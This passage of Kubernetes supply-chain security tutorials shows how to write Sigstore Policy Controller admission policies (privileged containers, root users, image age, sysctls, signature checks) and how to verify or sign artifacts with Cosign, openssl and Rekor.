pods running with privileges, you’ll create a pod that runs without elevated privileges and admit it into your cluster. Step 3 — Testing a ClusterImagePolicy Now that you have a policy defined, you can test that it successfully rejects or accepts admission requests. 
Use nano or your preferred editor to create a new file /tmp/pod.yaml and copy in the following pod spec that runs with elevated privileges: apiVersion: v1 kind: Pod metadata: name: yolo spec: containers: - name: "app" image: docker.io/ubuntu securityContext: privileged: true Apply the pod spec and check for the Policy Controller admission denied message: kubectl apply -f /tmp/pod.yaml Error from server (BadRequest): error when creating "pod.yaml": admission webhook "policy.sigstore.dev" denied the request: validation failed: failed policy: privileged-containers-cue: spec.containers[0].image index.docker.io/library/ubuntu@sha256:2adf22367284330af9f832ffefb717c78239f6251d9d0f58de50b86229ed1427 failed evaluating cue policy for ClusterImagePolicy: failed to evaluate the policy with error: spec.containers.0.securityContext.privileged: conflicting values false and true The first line shows the error message and the failing ClusterImagePolicy name. The second line contains the image ID, along with the specific CUE error message showing the policy violation. Edit the /tmp/pod.yaml file and change the privileged setting to false: privileged: false Save and apply the spec: kubectl apply -f /tmp/pod.yaml The pod will be admitted into the cluster with the following message: pod/yolo created Since the pod spec now ensures the container does not have elevated privileges, the Policy Controller evaluates the pod spec against the CUE policy and admits the pod into the cluster. Delete the pod once you’re done experimenting with it: kubectl delete pod yolo --- ### Disallowing Run as Root User URL: https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/disallowing-run-as-root-user-with-policy-controller/ Last Modified: May 10, 2024 Tags: policy-controller, Procedural, Policy This guide demonstrates how to use the Sigstore Policy Controller to prevent running containers as the root user in a Kubernetes cluster. You will create a ClusterImagePolicy that uses the CUE language to examine a pod spec, and only allow admission into a cluster if the pod is running as a non-root user. Prerequisites To follow along with this guide, you will need the following: A Kubernetes cluster with administrative access. You can set up a local cluster using kind or use an existing cluster. kubectl — to work with your cluster. Install kubectl for your operating system by following the official Kubernetes kubectl documentation. Sigstore Policy Controller installed in your cluster. Follow our How To Install Sigstore Policy Controller guide if you do not have it installed, and be sure to label any namespace that you intend to use with the policy.sigstore.dev/include=true label. Once you have everything in place you can continue to the first step and confirm that the Policy Controller is working as expected. Step 1 - Checking the Policy Controller is Denying Admission Before creating a ClusterImagePolicy, check that the Policy Controller is deployed and that your default namespace is labeled correctly. 
Run the following to check that the deployment is complete: kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-webhook && \ kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-policy-webhook When both deployments are finished, verify the default namespace is using the Policy Controller: kubectl get ns -l policy.sigstore.dev/include=true You should receive output like the following: NAME STATUS AGE default Active 24s Once you are sure that the Policy Controller is deployed and your default namespace is configured to use it, run a pod to make sure admission requests are handled and denied by default: kubectl run --image cgr.dev/chainguard/nginx:latest nginx Since there is no ClusterImagePolicy defined yet, the Policy Controller will deny the admission request with a message like the following: Error from server (BadRequest): admission webhook "policy.sigstore.dev" denied the request: validation failed: no matching policies: spec.containers[0].image cgr.dev/chainguard/nginx@sha256:628a01724b84d7db2dc3866f645708c25fab8cce30b98d3e5b76696291d65c4a In the next step, you will define a policy that ensures pods do not run as the root user and apply it to your cluster. Step 2 — Creating a ClusterImagePolicy Now that you have the Policy Controller running in your cluster, and have the default namespace configured to use it, you can now define a ClusterImagePolicy to admit images. Open a new file with nano or your preferred editor: nano /tmp/cip.yaml Copy the following policy to the /tmp/cip.yaml file: apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: disallow-runasuser-root-cue spec: match: - version: "v1" resource: "pods" images: [glob: '**'] authorities: [static: {action: pass}] mode: enforce policy: includeSpec: true type: "cue" data: | spec: { initContainers: [...{ securityContext: { runAsUser: != 0 } }] containers: [...{ securityContext: { runAsUser: != 0 } }] ephemeralContainers: [...{ securityContext: { runAsUser: != 0 } }] } This policy will ensure that any kind of container in a pod spec will only be admitted if the user is not root. Save the file and then apply the policy: kubectl apply -f /tmp/cip.yaml You will receive output showing the policy is created: clusterimagepolicy.policy.sigstore.dev/disallow-runasuser-root-cue Next you will test the policy with a failing pod spec. Once you have confirmed that the admission controller is rejecting pods running as root, you’ll create a pod that runs as a non-root user and admit it into your cluster. Step 3 — Testing a ClusterImagePolicy Now that you have a policy defined, you can test that it successfully rejects or accepts admission requests. 
Use nano or your preferred editor to create a new file /tmp/pod.yaml and copy in the following pod spec that runs as root: apiVersion: v1 kind: Pod metadata: name: yolo spec: containers: - name: "app" image: docker.io/ubuntu securityContext: # Violates disallow-runasuser-root-cue runAsUser: 0 Apply the pod spec and check for the Policy Controller admission denied message: kubectl apply -f /tmp/pod.yaml Error from server (BadRequest): error when creating "/tmp/pod.yaml": admission webhook "policy.sigstore.dev" denied the request: validation failed: failed policy: disallow-runasuser-root-cue: spec.containers[0].image index.docker.io/library/ubuntu@sha256:2adf22367284330af9f832ffefb717c78239f6251d9d0f58de50b86229ed1427 failed evaluating cue policy for ClusterImagePolicy: failed to evaluate the policy with error: spec.containers.0.securityContext.runAsUser: invalid value 0 (out of bound !=0) The first line shows the error message and the failing ClusterImagePolicy name. The second line contains the image ID, along with the specific CUE error message showing the policy violation. Edit the /tmp/pod.yaml file and change the runAsUser setting to use a non-root user: runAsUser: 65532 Save and apply the spec: kubectl apply -f /tmp/pod.yaml The pod will be admitted into the cluster with the following message: pod/yolo created Since the pod spec now uses a non-root user to run its processes, the Policy Controller evaluates the pod spec against the CUE policy and admits the pod into the cluster. Delete the pod once you’re done experimenting with it: kubectl delete pod yolo --- ### Maximum Container Image Age URL: https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/maximum-image-age-policy-controller/ Last Modified: May 10, 2024 Tags: policy-controller, Procedural, Policy This guide demonstrates how to use the Sigstore Policy Controller to enforce a maximum container image age before admitting an image into a Kubernetes cluster. In this guide, you will create a ClusterImagePolicy that checks the age of a container image, verifying that it isn’t older than 30 days. To test this, we’ll attempt to run two distroless images: one older than 30 days and one that is freshly built. Prerequisites To follow along with this guide, you will need the following: A Kubernetes cluster with administrative access. You can set up a local cluster using kind or use an existing cluster. kubectl — to work with your cluster. Install kubectl for your operating system by following the official Kubernetes kubectl documentation. Sigstore Policy Controller installed in your cluster. Follow our How To Install Sigstore Policy Controller guide if you do not have it installed, and be sure to label any namespace that you intend to use with the policy.sigstore.dev/include=true label. Once you have everything in place you can continue to the first step and confirm that the Policy Controller is working as expected. Step 1 - Checking the Policy Controller is Denying Admission Before creating a ClusterImagePolicy, check that the Policy Controller is deployed and that your default namespace is labeled correctly.
Run the following to check that the deployment is complete: kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-webhook && \ kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-policy-webhook When both deployments are finished, verify the default namespace is using the Policy Controller: kubectl get ns -l policy.sigstore.dev/include=true You should receive output like the following: NAME STATUS AGE default Active 24s Once you are sure that the Policy Controller is deployed and your default namespace is configured to use it, run a pod to see how admission requests are handled before the policy is in place: kubectl run --image ghcr.io/distroless/static myoldimage Since there is no ClusterImagePolicy defined yet, the Policy Controller will allow the admission request. In the next step, you will define a policy that verifies container images are less than 30 days old and apply it to your cluster. Step 2 — Creating a ClusterImagePolicy Now that you have the Policy Controller running in your cluster, and have the default namespace configured to use it, you can now define a ClusterImagePolicy to admit images. Open a new file with nano or your preferred editor: nano /tmp/cip.yaml Copy the following policy to the /tmp/cip.yaml file: # Copyright 2022 Chainguard, Inc. # SPDX-License-Identifier: Apache-2.0 apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: maximum-image-age-rego annotations: catalog.chainguard.dev/title: Maximum image age catalog.chainguard.dev/description: | This checks that the maximum age an image is allowed to have is 30 days old. This is measured using the container image's configuration, which has a "created" field. Some build tools may fail this check because they build reproducibly, and use a fixed date (e.g. the Unix epoch) as their creation time, but many of these tools support specifying SOURCE_DATE_EPOCH, which aligns the creation time with the date of the source commit. catalog.chainguard.dev/labels: rego spec: images: [{glob: "**"}] authorities: [{static: {action: pass } }] mode: enforce policy: fetchConfigFile: true type: "rego" data: | package sigstore nanosecs_per_second = 1000 * 1000 * 1000 nanosecs_per_day = 24 * 60 * 60 * nanosecs_per_second # Change this to the maximum number of days to allow. maximum_age = 30 * nanosecs_per_day isCompliant[response] { created := time.parse_rfc3339_ns(input.config[_].created) response := { "result" : time.now_ns() < created + maximum_age, "error" : "Image exceeds maximum allowed age." } } The glob: ** line, working in combination with the authorities and policy sections, will allow any image that has been built in the last 30 days to be admitted into your cluster. The fetchConfigFile option instructs the Policy Controller to check the image configuration looking for the age of the image. The rest of the fields are: authorities: this setting tells the Policy Controller to skip any verification looking for the presence of an image signature. mode: this blocks the admission of any image older than 30 days. policy.data: contains the Rego policy itself that verifies when the image was created.
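To see the created field that this Rego policy evaluates, you can inspect an image's configuration locally before applying the policy (a sketch using Docker; any image reference you can pull works here):

```bash
# Pull an image and print the creation timestamp from its configuration,
# the same field the policy reads when fetchConfigFile is enabled.
docker pull cgr.dev/chainguard/static
docker inspect --format '{{.Created}}' cgr.dev/chainguard/static
```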
Save the file and then apply the policy: kubectl apply -f /tmp/cip.yaml You will receive output showing the policy is created: clusterimagepolicy.policy.sigstore.dev/maximum-image-age-rego created Now run the cgr.dev/chainguard/static image: kubectl run --image cgr.dev/chainguard/static mydailyfreshimage Since this image is rebuilt on a daily basis, you will receive a message that the pod was created successfully: pod/mydailyfreshimage created However, if we now create a pod using the older ghcr.io/distroless/static image from the myoldimage example, the Policy Controller rejects the admission request with a message like the following: Error from server (BadRequest): admission webhook "policy.sigstore.dev" denied the request: validation failed: ghcr.io/distroless/static@sha256:a9650a15060275287ebf4530b34020b8d998bd2de9aea00d113c332d8c41eb0b failed evaluating rego policy for type ClusterImagePolicy: policy is not compliant for query 'isCompliant = data.sigstore.isCompliant' with errors: Image exceeds maximum allowed age. Delete the pod once you’re done experimenting with it: kubectl delete pod mydailyfreshimage To learn more about how the Policy Controller uses Cosign to verify and admit images, review the Cosign Sigstore documentation. --- ### Disallowing Unsafe sysctls URL: https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/disallowing-unsafe-sysctls-with-policy-controller/ Last Modified: May 10, 2024 Tags: policy-controller, Procedural, Policy This guide demonstrates how to use the Sigstore Policy Controller to ensure that pods which use sysctls to modify kernel behaviour run only with the safe set of parameters. You will create a ClusterImagePolicy that uses the CUE language to examine a pod spec that uses sysctls, and only allow admission into a cluster if the pod uses a safe set of parameters. Prerequisites To follow along with this guide, you will need the following: A Kubernetes cluster with administrative access. You can set up a local cluster using kind or use an existing cluster. kubectl — to work with your cluster. Install kubectl for your operating system by following the official Kubernetes kubectl documentation. Sigstore Policy Controller installed in your cluster. Follow our How To Install Sigstore Policy Controller guide if you do not have it installed, and be sure to label any namespace that you intend to use with the policy.sigstore.dev/include=true label. Once you have everything in place you can continue to the first step and confirm that the Policy Controller is working as expected. Step 1 - Checking the Policy Controller is Denying Admission Before creating a ClusterImagePolicy, check that the Policy Controller is deployed and that your default namespace is labeled correctly.
Run the following to check that the deployment is complete: kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-webhook && \ kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-policy-webhook When both deployments are finished, verify the default namespace is using the Policy Controller: kubectl get ns -l policy.sigstore.dev/include=true You should receive output like the following: NAME STATUS AGE default Active 24s Once you are sure that the Policy Controller is deployed and your default namespace is configured to use it, run a pod to make sure admission requests are handled and denied by default: kubectl run --image docker.io/ubuntu ubuntu Since there is no ClusterImagePolicy defined yet, the Policy Controller will deny the admission request with a message like the following: Error from server (BadRequest): admission webhook "policy.sigstore.dev" denied the request: validation failed: no matching policies: spec.containers[0].image index.docker.io/library/ubuntu@sha256:854037bf6521e9c321c101c269272f756e481fb5f167ae032cb53da08aebcd5a In the next step, you will define a ClusterImagePolicy that verifies a pod spec is using safe sysctl parameters. Step 2 — Creating a ClusterImagePolicy Now that you have the Policy Controller running in your cluster, and have the default namespace configured to use it, you can now define a ClusterImagePolicy to admit images. Open a new file with nano or your preferred editor: nano /tmp/cip.yaml Copy the following policy to the /tmp/cip.yaml file: apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: unsafe-sysctls-mask-cue spec: match: - version: "v1" resource: "pods" images: [glob: '**'] authorities: [static: {action: pass}] mode: enforce policy: includeSpec: true type: "cue" data: | spec: { securityContext: sysctls: [...{ name: "kernel.shm_rmid_forced" | "net.ipv4.ip_local_port_range" | "net.ipv4.ip_unprivileged_port_start" | "net.ipv4.tcp_syncookies" | "net.ipv4.ping_group_range" }] } This policy will ensure that any pod that has a sysctl defined in its spec will only be admitted if it matches a parameter from the list. Save the file and then apply the policy: kubectl apply -f /tmp/cip.yaml You will receive output showing the policy is created: clusterimagepolicy.policy.sigstore.dev/unsafe-sysctls-mask-cue Next, you will test the policy with a failing pod spec. Once you have confirmed that the admission controller is rejecting pods using unsafe sysctls, you’ll create a pod with a safe parameter and admit it into your cluster. Step 3 — Testing the ClusterImagePolicy Now that you have a policy defined, you can test that it successfully rejects or accepts admission requests. 
Use nano or your preferred editor to create a new file /tmp/pod.yaml and copy in the following pod spec that uses an unsafe sysctl: apiVersion: v1 kind: Pod metadata: name: yolo spec: securityContext: sysctls: - name: kernel.msgmax value: "65536" containers: - name: "app" image: docker.io/ubuntu Apply the pod spec and check for the Policy Controller admission denied message: kubectl apply -f /tmp/pod.yaml Error from server (BadRequest): error when creating "/tmp/pod.yaml": admission webhook "policy.sigstore.dev" denied the request: validation failed: failed policy: unsafe-sysctls-mask-cue: spec.containers[0].image index.docker.io/library/ubuntu@sha256:854037bf6521e9c321c101c269272f756e481fb5f167ae032cb53da08aebcd5a failed evaluating cue policy for ClusterImagePolicy: failed to evaluate the policy with error: spec.securityContext.sysctls.0.name: 5 errors in empty disjunction: (and 5 more errors) The first line shows the error message and the failing ClusterImagePolicy name. The second line contains the image ID, along with the specific CUE error message showing the policy violation. Edit the /tmp/pod.yaml file and change the sysctls section to use the following safe parameter: sysctls: - name: net.ipv4.tcp_syncookies value: "1" Save and apply the spec: kubectl apply -f /tmp/pod.yaml The pod will be admitted into the cluster with the following message: pod/yolo created Since the `net.ipv4.tcp_syncookies` sysctl is namespaced in the kernel and considered safe, the Policy Controller evaluates the pod spec against the CUE policy and admits the pod into the cluster. Delete the pod once you're done experimenting with it: kubectl delete pod yolo --- ### Verify Signed Chainguard Containers URL: https://edu.chainguard.dev/open-source/sigstore/policy-controller/policies/using-policy-controller-to-verify-signed-chainguard-images/ Last Modified: May 10, 2024 Tags: policy-controller, Procedural, Policy, Chainguard Containers This guide demonstrates how to use the Sigstore Policy Controller to verify image signatures before admitting an image into a Kubernetes cluster. In this guide, you will create a ClusterImagePolicy that checks for a keyless Cosign image signature, and then test the admission controller by running a signed nginx image. Prerequisites To follow along with this guide, you will need the following: A Kubernetes cluster with administrative access. You can set up a local cluster using kind or use an existing cluster. kubectl — to work with your cluster. Install kubectl for your operating system by following the official Kubernetes kubectl documentation. Sigstore Policy Controller installed in your cluster. Follow our How To Install Sigstore Policy Controller guide if you do not have it installed, and be sure to label any namespace that you intend to use with the policy.sigstore.dev/include=true label. Once you have everything in place you can continue to the first step and confirm that the Policy Controller is working as expected. Step 1 - Checking the Policy Controller is Denying Admission Before creating a ClusterImagePolicy, check that the Policy Controller is deployed and that your default namespace is labeled correctly.
Run the following to check that the deployment is complete: kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-webhook && \ kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-policy-webhook When both deployments are finished, verify the default namespace is using the Policy Controller: kubectl get ns -l policy.sigstore.dev/include=true You should receive output like the following: NAME STATUS AGE default Active 24s Once you are sure that the Policy Controller is deployed and your default namespace is configured to use it, run a pod to make sure admission requests are handled and denied by default: kubectl run --image cgr.dev/chainguard/nginx:latest nginx Since there is no ClusterImagePolicy defined yet, the Policy Controller will deny the admission request with a message like the following: Error from server (BadRequest): admission webhook "policy.sigstore.dev" denied the request: validation failed: no matching policies: spec.containers[0].image cgr.dev/chainguard/nginx@sha256:628a01724b84d7db2dc3866f645708c25fab8cce30b98d3e5b76696291d65c4a In the next step, you will define a policy that verifies Chainguard Containers are signed and apply it to your cluster. Step 2 — Creating a ClusterImagePolicy Now that you have the Policy Controller running in your cluster, and have the default namespace configured to use it, you can now define a ClusterImagePolicy to admit images. Open a new file with nano or your preferred editor: nano /tmp/cip.yaml Copy the following policy to the /tmp/cip.yaml file: apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: chainguard-images-are-signed annotations: catalog.chainguard.dev/title: Chainguard Containers catalog.chainguard.dev/description: Enforce Chainguard Containers are signed catalog.chainguard.dev/labels: chainguard spec: images: - glob: cgr.dev/chainguard/** authorities: - keyless: url: https://fulcio.sigstore.dev identities: - issuer: https://token.actions.githubusercontent.com subject: https://github.com/chainguard-images/images/.github/workflows/release.yaml@refs/heads/main ctlog: url: https://rekor.sigstore.dev name: authority-0 The glob: cgr.dev/chainguard/** line, working in combination with the authorities section, will allow any image in the cgr.dev/chainguard image registry that has a keyless signature to be admitted into your cluster. The - keyless options instruct the Policy Controller what to check for when it examines the signature on any image from the cgr.dev/chainguard registry. The specific fields are: url: this setting tells the Policy Controller where to find the Certificate Authority (CA) that issued an image signature. issuer: the issuer field contains the URI of the OpenID Connect (OIDC) Identity Provider that digitally signed the identity token. subject: the subject field must contain a URI or an email address that identifies where the signed image originated. ctlog: this setting tells the Policy Controller which Certificate Transparency log to query when it is validating a signature.
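You can run an equivalent keyless check from the command line with Cosign before applying the policy, using the same issuer and subject values (a sketch; it assumes you can pull the image):

```bash
# Verify the keyless signature on a Chainguard image with the same identity
# constraints the ClusterImagePolicy above enforces.
cosign verify \
  --certificate-oidc-issuer=https://token.actions.githubusercontent.com \
  --certificate-identity=https://github.com/chainguard-images/images/.github/workflows/release.yaml@refs/heads/main \
  cgr.dev/chainguard/nginx:latest | jq
```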
Save the file and then apply the policy: kubectl apply -f /tmp/cip.yaml You will receive output showing the policy is created: clusterimagepolicy.policy.sigstore.dev/chainguard-images-are-signed created Now run the cgr.dev/chainguard/nginx:latest image again: kubectl run --image cgr.dev/chainguard/nginx:latest nginx Since the image matches the policy, you will receive a message that the pod was created successfully: pod/nginx created In the background, the Policy Controller queries the specified ctlog from the policy that you created to find a record in the log that matches the image being requested (cgr.dev/chainguard/nginx:latest). The Policy Controller ensures that the SHA256 hash of the image matches the hash that is recorded in the certificate issued by the OIDC issuer when the image was first signed. Finally, the Policy Controller verifies the issued certificate was signed by the specified Certificate Authority’s (https://fulcio.sigstore.dev) root signing certificate. Once the Policy Controller verifies the signature of the image’s hash in the transparency log matches the computed hash of the image, and the certificate’s validity based on the CA chain of trust, it will admit the pod into the cluster. Delete the pod once you’re done experimenting with it: kubectl delete pod nginx To learn more about how the Policy Controller uses Cosign to verify and admit images, review the Cosign Sigstore documentation. --- ### How to Verify File Signatures with Cosign URL: https://edu.chainguard.dev/open-source/sigstore/cosign/how-to-verify-file-signatures-with-cosign/ Last Modified: November 13, 2024 Tags: Cosign, Procedural Cosign can be used to verify binary artifacts (“blobs”) using signatures and certificates provided alongside them. In this tutorial, we’ll verify a binary artifact — in this case, a release of apko, a command-line tool for building container images using a declarative language based on YAML. The methods in this tutorial apply to any blob file Cosign has signed with a keyless signature. This tutorial assumes you have Cosign installed. Verifying a binary with Cosign keyless signatures All apko releases include keyless signatures using Cosign. You can verify the signature for an apko release using the cosign tool directly, or by calculating the SHA256 hash of the release and finding the corresponding Rekor transparency log entry. If you would like to learn how to verify a binary using Rekor or curl, follow the steps in our guide on How to Verify File Signatures with Rekor or curl. We’ll use the apko_0.19.9_linux_arm64.tar.gz tar archive from the apko GitHub Release v0.19.9 page in this example.
There are three URLs from the list of assets on that page that you will need to copy: The release itself: https://github.com/chainguard-dev/apko/releases/download/v0.19.9/apko_0.19.9_linux_arm64.tar.gz The signature file: https://github.com/chainguard-dev/apko/releases/download/v0.19.9/apko_0.19.9_linux_arm64.tar.gz.sig The public certificate: https://github.com/chainguard-dev/apko/releases/download/v0.19.9/apko_0.19.9_linux_arm64.tar.gz.crt With these URLs, construct (or copy) the following command to verify the tar archive: cosign verify-blob \ --signature https://github.com/chainguard-dev/apko/releases/download/v0.19.9/apko_0.19.9_linux_arm64.tar.gz.sig \ --certificate https://github.com/chainguard-dev/apko/releases/download/v0.19.9/apko_0.19.9_linux_arm64.tar.gz.crt \ --certificate-oidc-issuer "https://token.actions.githubusercontent.com" \ --certificate-identity "https://github.com/chainguard-dev/apko/.github/workflows/release.yaml@refs/tags/v0.19.9" \ https://github.com/chainguard-dev/apko/releases/download/v0.19.9/apko_0.19.9_linux_arm64.tar.gz Running the command may take a moment, but when it completes you will receive the following output: Verified OK If any of the URLs are incorrect, if there was a problem with the apko release file, if the signature or certificate identity don’t match, or if the release file was not signed, you will receive an error like the following: Error: searching log query: [POST /api/v1/log/entries/retrieve][400] searchLogQueryBadRequest &{Code:400 Message:verifying signature: invalid signature when validating ASN.1 encoded signature} main.go:74: error during command execution: searching log query: [POST /api/v1/log/entries/retrieve][400] searchLogQueryBadRequest &{Code:400 Message:verifying signature: invalid signature when validating ASN.1 encoded signature} You can also download the files and verify them locally: curl -L -O https://github.com/chainguard-dev/apko/releases/download/v0.19.9/apko_0.19.9_linux_arm64.tar.gz \ -O https://github.com/chainguard-dev/apko/releases/download/v0.19.9/apko_0.19.9_linux_arm64.tar.gz.sig \ -O https://github.com/chainguard-dev/apko/releases/download/v0.19.9/apko_0.19.9_linux_arm64.tar.gz.crt You can then verify the files that you downloaded using Cosign: cosign verify-blob \ --signature apko_0.19.9_linux_arm64.tar.gz.sig \ --certificate apko_0.19.9_linux_arm64.tar.gz.crt \ --certificate-oidc-issuer "https://token.actions.githubusercontent.com" \ --certificate-identity "https://github.com/chainguard-dev/apko/.github/workflows/release.yaml@refs/tags/v0.19.9" \ apko_0.19.9_linux_arm64.tar.gz If you receive an error while verifying a binary with Cosign, then you know that there was a problem with creating the artifact, or that the file that you are verifying is corrupted or invalid. If that is the case, you should download a fresh copy and verify it again, or try a different version of the software with a working signature. --- ### Cosign: The Manual Way URL: https://edu.chainguard.dev/open-source/sigstore/cosign/cosign-manual-way/ Last Modified: March 29, 2023 Tags: Cosign, Overview When I first used Cosign, the software artifact signing CLI from the Sigstore project, I was amazed at how painless signing and verifying could be. For example, in the three commands below we create a public/private key pair, sign the text file, upload it to the Rekor transparency log, and verify the signature of the message. 
# create public/private keys $ cosign generate-key-pair Enter password for private key: Enter password for private key again: Private key written to cosign.key Public key written to cosign.pub # sign an artifact and output the signature $ cosign sign-blob --key cosign.key --output-signature sig message.txt Using payload from: message.txt Enter password for private key: tlog entry created with index: 2014997 Signature wrote in the file sig # verify the signature $ cosign verify-blob --key cosign.pub --signature sig message.txt tlog entry verified with uuid: 7e53fd5d089af142b7909598d214e13ca76001cc575fddaad3210adbee86363e index: 7155742 Verified OK These quick commands show how easily Sigstore can be integrated into software security practices for any developer. I am the kind of person who always wants to know what's going on under the hood. In this tutorial, I will walk you through doing Cosign the manual way so you too can understand the ins and outs of Cosign. Tools If you want to follow along you'll need the following installed from your package manager of choice. I've noted the version used in this post but different minor versions should be fine. However, keep in mind that OpenSSL can drastically vary per system. openssl (3.0.8) Note: macOS uses libressl but it should still work jq (jq-1.6) curl (7.88.1) xxd (2022-01-14) Note: macOS requires coreutils installed via Homebrew go (go1.20.2) cosign (v2.0.0) rekor-cli (v1.0.1) The Blob A blob is an arbitrary collection of raw data like a picture or the executable binary that your source code produces. Cosign is capable of signing and verifying blobs. In our case, we'll be signing a spooky message. Let's write that message to a file. $ echo 'Beware The Blob!' > message.txt We'll be using Cosign to sign this .txt file blob. Keys Before we can sign our message we need to generate a key pair. A key pair is a set of two keys, one private and one public, that can both sign/verify and encrypt/decrypt data. The private key is generated by some algorithm and the public key is derived from the private. There are a handful of different algorithms in use today, but the most common are RSA, ECDSA, and Ed25519. I fell deep down the rabbit hole learning about the differences between these algorithms, potential NSA backdoors and which versions of OpenSSL support a given algorithm. To keep things simple, we'll use RSA but I encourage you to chase the rabbit on your own. The RSA algorithm in use today is defined by the Public Key Cryptography Standards #1 (PKCS1) specification. Let's generate a 4096 bit RSA private key with OpenSSL. $ openssl genrsa -out key.pem 4096 Generating RSA private key, 4096 bit long modulus (2 primes) ...................................................................................................................... .............++++ .................++++ e is 65537 (0x010001) And from that private key we can output the public key. $ openssl rsa -in key.pem -pubout -out pub.pem writing RSA key $ cat key.pem -----BEGIN RSA PRIVATE KEY----- MIIJKgIBAAKCAgEA1BgrTaqV3zS+TOx6A/n+59ECOlXl7Uk7W82wNe7kUgfVAIGj Bci+Tc7O/nf/7GCMlzli/4n5WE0Ny2i/Kj4Ycsu6TUEcW6XaJSz4R4TBTHAcQiNq 8EkBQ2S5SuIIEekvCdVffkob3NtipOd/FaiLS1NVUAFcqOGHl2DYEkhP2puBS+Ad … $ cat pub.pem -----BEGIN PUBLIC KEY----- MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA1BgrTaqV3zS+TOx6A/n+ 59ECOlXl7Uk7W82wNe7kUgfVAIGjBci+Tc7O/nf/7GCMlzli/4n5WE0Ny2i/Kj4Y csu6TUEcW6XaJSz4R4TBTHAcQiNq8EkBQ2S5SuIIEekvCdVffkob3NtipOd/FaiL … We now have our keys but this is still a bit of magic.
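If you want a first peek at what is actually inside these files before we unpack the terminology, OpenSSL can dump the encoded structure for you. This is an optional aside that only uses the openssl tool from the list above; the output is a long list of ASN.1 elements, so it is piped through head here:

# Dump the ASN.1 structure encoded inside each PEM file (truncated for readability)
$ openssl asn1parse -in key.pem | head
$ openssl asn1parse -in pub.pem | head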
What is a PEM and what is this syntax? To answer that, let’s look at doing the same thing we just did in Go (omitting errors for brevity). // main.go package main import ( "crypto/rand" "crypto/rsa" "crypto/x509" "encoding/pem" "os" ) func main() { key, _ := rsa.GenerateKey(rand.Reader, 4096) b := x509.MarshalPKCS1PrivateKey(key) priv := pem.EncodeToMemory(&pem.Block{ Type: "RSA PRIVATE KEY", Bytes: b, }) os.WriteFile("key.pem", priv, 0600) b, _ = x509.MarshalPKIXPublicKey(key.Public()) pub := pem.EncodeToMemory(&pem.Block{ Type: "PUBLIC KEY", Bytes: b, }) os.WriteFile("pub.pem", pub, 0600) } Go’s crypto library is a joy to work with and the implementation for rsa.GenerateKey is worth peeking at. After calling it to generate our private key, we have a bunch of mathy bits that we need to represent somehow — enter Abstract Syntax Notation number One (ASN.1) and Distinguished Encoding Rules (DER). ASN.1 is the syntax we express our key in (think a .proto file) and DER is how we encode it (think Protobuf wire format). For a more detailed explanation, Let’s Encrypt has a great article. After calling x509.MarshalPKCS1PrivateKey our private key is an ASN.1 DER encoded PKCS1 byte array 😅. We still have one last step, however. Byte arrays aren’t human readable and are difficult to copypasta. As we often do when transmitting binary data we need to Base64 encode our bytes. Slapping on a header (-----BEGIN RSA PRIVATE KEY------) and footer (-----END RSA PRIVATE KEY-----) to help parsers identify our content finally leaves us with our Privacy-Enhanced Mail (PEM) file. PEM is a standard container for certificates and keys and was created to send binary data over email without messing with their contents. Since PKCS1 is specific to RSA our public key is serialized to Public Key Infrastructure X.509 (PKIX) which is a generic public key representation that includes information like the key algorithm. X.509 is the standard that defines the format for public key certificates like those used in your web browser. You can see above that the header is the generic -----BEGIN PUBLIC KEY-----. Time to Sign With our keys created, we are ready to use them to sign our message. We could sign the file in its entirety, but that would require the full file when verifying the signature. This is fine for small text files but when signing and uploading 3 gigabyte containers, it’s much more efficient to hash the payload and sign the digest. That way all that’s needed to verify a signature is the public key and the hash value. SHA-256 is most commonly used today for computing a message digest. $ openssl dgst -sha256 -sign key.pem -out message.txt.sig message.txt We can confirm our signing was successful by verifying the signature with the public key. openssl dgst -sha256 -verify pub.pem -signature message.txt.sig message.txt Verified OK Get Transparent Now that we have our signature, we can upload everything to the Rekor transparency log so others can find and verify it. Rekor supports a handful of different distinct types including Java JARs and RPM packages. The basic type is known as a Rekord but since we signed the hash of our file we’ll use a Hashed Rekord. Most of the fields in Rekor’s types require Base64 encoding, so let’s store these values in environment variables to make writing the payload easier. 
$ SIGSTORE_SIG_CONTENT=$(cat message.txt.sig | base64 | tr -d '\n') $ SIGSTORE_PUBLIC_KEY=$(cat pub.pem | base64 | tr -d '\n') $ SIGSTORE_HASH_CONTENT=$(shasum -a 256 message.txt | cut -d " " -f 1) Next, we’ll write out the payload to a file to make it easier to inspect and use in a request. $ cat <<EOF > hashedrekord.json { "apiVersion": "0.0.1", "kind": "hashedrekord", "spec": { "data": { "hash": { "algorithm": "sha256", "value": "$SIGSTORE_HASH_CONTENT" } }, "signature": { "content": "$SIGSTORE_SIG_CONTENT", "publicKey": { "content": "$SIGSTORE_PUBLIC_KEY" } } } } EOF Do a quick sanity check that our payload was created successfully. $ cat hashedrekord.json { "apiVersion": "0.0.1", "kind": "hashedrekord", "spec": { "data": { "hash": { "algorithm": "sha256", "value": "d8d321 … We’re now ready to send our data off to Rekor. Let’s save the response to a file so we can poke around. $ curl -X POST -H "Content-Type: application/json" --data-binary @hashedrekord.json https://rekor.sigstore.dev/api/v1/log/entries > response.json The top-level key of the response will be the database shard ID (16 characters) + entry UUID (64 characters) in the transparency log. # top level key $ jq -r 'keys[0]' response.json 24296fb24b8ad77a7e53fd5d089af142b7909598d214e13ca76001cc575fddaad3210adbee86363e # shard id $ jq -r 'keys[0]' response.json | cut -c -16 24296fb24b8ad77a # entry uuid $ jq -r 'keys[0]' response.json | cut -c 17- 7e53fd5d089af142b7909598d214e13ca76001cc575fddaad3210adbee86363e The entry UUID is actually the hash of the Merkle Tree leaf node for our entry. I won’t attempt to explain Merkle Trees in depth, but the basic idea is that inclusion of a node can be cryptographically 